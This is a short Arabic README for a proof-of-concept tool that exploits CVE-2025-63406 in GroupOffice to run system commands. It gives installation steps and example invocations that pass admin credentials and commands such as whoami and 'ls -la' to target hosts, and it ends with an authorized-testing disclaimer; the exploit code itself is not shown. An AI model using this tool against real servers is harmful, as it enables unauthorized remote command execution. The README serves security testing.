
PoC صغير لأتمتة استغلال CVE-2025-63406.
# تثبيت التبعيات
pip install -r requirements.txt
# أو استخدم بيئة افتراضية
python3 -m venv venv
source venv/bin/activate # في ويندوز: venv\Scripts\activate
pip install -r requirements.txt
python3 CVE-2025-63406.py -u <URL> -n <اسم_المستخدم> -p <كلمة_المرور> -c <الأمر>
-u, --url: رابط قاعدة مثيل GroupOffice (مثال: http://localhost:9090)-n, --username: اسم المستخدم للمصادقة-p, --password: كلمة المرور للمصادقة-c, --command: أمر النظام لتنفيذه (مثال: whoami, id, ls -la)# تنفيذ أمر whoami
python3 CVE-2025-63406.py -u http://localhost:9090 -n admin -p password -c whoami
# تنفيذ أمر id
python3 CVE-2025-63406.py -u http://target.com:9090 -n admin -p password -c id
# سرد الملفات في الدليل الحالي
python3 CVE-2025-63406.py -u http://target.com:9090 -n admin -p password -c "ls -la"
# الحصول على معلومات النظام
python3 CVE-2025-63406.py -u http://target.com:9090 -n admin -p password -c "uname -a"

⚠️ هذه الأداة مخصصة للاختبار المصرح به فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني.